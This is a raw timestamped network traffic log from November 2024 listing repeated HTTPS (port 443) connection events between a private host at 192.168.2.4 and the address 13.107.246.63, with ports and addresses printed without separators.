                                                                                                                                                                                            Nov 20, 2024 21:05:10.640202045 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.640221119 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.718723059 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.718931913 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.719105005 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.719382048 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.719396114 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.719412088 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.719418049 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.722671032 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.722687960 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.722779036 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.722951889 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.722969055 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.109282970 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.109998941 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.110022068 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.110604048 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.110609055 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.142426014 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.143304110 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.143333912 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.143800020 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.143806934 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.425539017 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.426187992 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.426208973 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.426892042 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.426898003 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.523020029 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.523757935 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.523785114 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.524221897 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.524229050 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.594388008 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.594543934 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.594727039 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.594805002 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.594822884 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.594851017 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.594857931 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.598436117 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.598484039 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.598599911 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.598803043 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.598824024 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.599678040 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.600153923 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.600169897 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.600579023 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.600584030 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.667186022 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.667254925 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.667422056 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.667936087 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.667937040 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.667958975 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.667968988 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.671717882 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.671746969 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.671817064 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.671967030 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.671981096 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.875407934 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.875498056 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.875586033 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.875734091 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.875750065 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.875787973 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.875793934 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.879003048 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.879035950 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.879102945 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.879242897 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.879261971 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.998146057 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.998313904 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.998435974 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.998577118 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.998596907 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:12.998706102 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:12.998714924 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:13.002039909 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:13.002085924 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:13.002161980 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:13.002331972 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:13.002346992 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:13.071264982 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:13.071470022 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:13.071568966 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:13.071654081 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:13.071654081 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:13.071666002 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:13.071675062 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:13.074774981 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:13.074790001 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:13.074875116 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:13.075054884 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:13.075067997 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.376008034 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.376599073 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.376621962 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.377223969 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.377229929 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.528227091 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.528964996 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.528987885 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.529742002 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.529748917 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.817059040 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.817136049 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.817209005 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.817461967 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.817478895 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.817488909 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.817495108 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.821119070 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.821151972 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.821296930 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.821496964 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.821510077 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.832035065 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.832515955 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.832525969 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.832978964 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.832983971 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.925287962 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.925949097 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.925972939 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.926532030 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.926537991 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.926728010 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.927050114 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.927071095 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:14.927536011 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:14.927541971 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.001744032 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.001904011 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.002022982 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.002126932 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.002146006 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.002178907 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.002185106 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.005798101 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.005829096 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.005906105 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.006246090 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.006257057 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.277004957 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.277089119 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.277163982 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.291166067 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.291174889 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.291187048 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.291192055 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.294699907 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.294737101 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.294805050 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.295299053 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.295316935 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.383650064 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.383821964 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.383882999 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.384052992 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.384068966 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.384079933 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.384084940 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.386919975 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.386961937 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.387034893 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.387197018 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.387211084 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.393528938 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.393588066 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.393646002 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.393851042 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.393851042 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.393872976 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.393883944 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.396650076 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.396681070 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:15.396755934 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.396927118 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:15.396943092 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:16.724605083 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:16.725275040 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:16.725294113 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:16.725892067 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:16.725897074 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:16.847542048 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:16.848537922 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:16.848552942 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:16.849040985 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:16.849044085 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.116369963 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.116939068 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.116951942 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.117311954 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.117321014 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.223433018 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.223517895 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.223602057 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.225574017 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.225603104 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.225615025 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.225625038 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.229783058 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.229819059 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.229875088 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.232634068 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.232647896 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.310806990 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.310956955 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.311027050 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.311263084 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.311276913 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.311285973 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.311290979 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.313779116 CET49851443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.313818932 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.313894987 CET49851443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.314039946 CET49851443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.314050913 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.349626064 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.350213051 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.350229025 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.350686073 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.350692987 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.393173933 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.393822908 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.393837929 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.394248009 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.394259930 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.591126919 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.591212988 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.591296911 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.591532946 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.591548920 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.591622114 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.591629028 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.594121933 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.594151020 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.594221115 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.594353914 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.594363928 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.833357096 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.833525896 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.833604097 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.833673000 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.833692074 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.833708048 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.833714962 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.836287022 CET49853443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.836361885 CET4434985313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.836469889 CET49853443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.836605072 CET49853443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.836621046 CET4434985313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.859555960 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.859639883 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.859700918 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.859853983 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.859874010 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.859889030 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.859896898 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.862823009 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.862864971 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:17.862950087 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.863105059 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:17.863132000 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.062902927 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.063333988 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:19.063365936 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.063785076 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:19.063791037 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.143572092 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.144306898 CET49851443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:19.144340038 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.144745111 CET49851443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:19.144751072 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.516062021 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.516663074 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:19.516688108 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.517191887 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:19.517203093 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.527347088 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.527542114 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.527674913 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:19.527713060 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:19.527733088 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:19.527755022 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:19.527761936 CET4434985013.107.246.63192.168.2.4
